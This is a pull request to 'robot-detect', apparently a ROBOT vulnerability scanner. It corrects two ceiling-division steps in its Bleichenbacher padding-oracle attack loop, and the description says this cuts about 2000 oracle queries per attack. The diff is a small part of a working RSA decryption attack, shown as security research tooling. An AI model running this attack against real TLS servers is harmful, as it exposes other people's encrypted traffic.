### PR TITLE
Minor Mathematical Corrections

### DIFF
--- a/robot-detect
+++ b/robot-detect
@@ -366,7 +366,7 @@ while True:
     # find pairs r,s such that m*s % N = m*s-r*N is PKCS conforming
     # 2.a)
     if i == 1:
-        s = N // (3 * B)
+        s = -(-N // (3 * B))
         cc = (int(gmpy2.powmod(s, e, N)) * c0) % N
         while not BleichenbacherOracle(cc):
             s += 1
@@ -385,7 +385,7 @@ while True:
         a, b = M.pop()
         M.add((a, b))
         r = 2 * (b * s - 2 * B) // N
-        s = -(-(2 * B + r * N // b))
+        s = -(-(2 * B + r * N) // b)
         cc = (int(gmpy2.powmod(s, e, N)) * c0) % N
         while not BleichenbacherOracle(cc):
             s += 1


### PR DESCRIPTION
**Correction in Step 2a.** - `s = N // (3 * B)` changed to `s = -(-N // (3 * B))` to ceil the value and get the smallest possible value for  _s<sub>1</sub> ≥ n/(3B)_. 

**Correction in Step 2c.** - Corrected `s = -(-(2 * B + r * N // b))`  to `s = -(-(2 * B + r * N) // b)` to get the lower bound on _s<sub>i</sub> ≥ (2B + r<sub>i</sub>n) / b_  as is required in this step. 

The above corrections introduced a marginal improvement in the attack efficiency. For one of my attack demos, the corrections improved the attack by requiring approximately 2000 oracle queries less than before.
